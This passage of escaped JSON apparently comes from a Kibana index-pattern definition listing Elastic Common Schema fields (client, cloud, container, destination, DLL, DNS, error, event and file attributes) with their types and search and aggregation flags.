s\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggre